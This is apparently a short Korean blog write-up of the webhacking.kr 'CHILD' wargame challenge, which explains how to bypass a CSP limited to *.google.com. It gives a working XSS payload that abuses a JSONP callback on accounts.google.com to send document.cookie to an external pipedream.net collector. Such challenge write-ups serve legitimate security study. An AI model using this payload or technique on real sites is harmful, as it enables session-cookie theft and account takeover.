webhacking.kr CHILD write-up
2021. 4. 17. 15:39
문제 분석
전형적인 XSS 문제이고, CSP를 우회하는 문제이다. 해당 문제의 HTTP Header를 보면 다음과 같다.
script-src https://*.google.com/ 으로 되어있다. google의 서비스 중 하나를 찾아서 reflective한 값을 출력해주는 곳을 찾아야 하겠다.
Exploit.
?inject=%3Cscript+src=%22https://accounts.google.com/o/oauth2/revoke?callback=(location.href=%27https://enl33h4vtg95t8o.m.pipedream.net/?c=%27%252bdocument.cookie);%22%3E%3C/script%3E
구글링을 조금 해보니까 callback을 통해 javascript code를 삽입할 수 있는 구글 서비스들이 있었다. 그중에 accounts.google.com이 사용할 수 있는 특수문자가 많아서 위 익스플로잇 코드를 사용했다.
Reference
[*] Content Security Bypass Techniques : Content Security Bypass Techniques to perform XSS | Medium
'write-ups > webhacking.kr' 카테고리의 다른 글
webhacking.kr slipping beauty write-up (0) | 2021.04.21 |
---|---|
webhacking.kr NotSQL (0) | 2021.04.20 |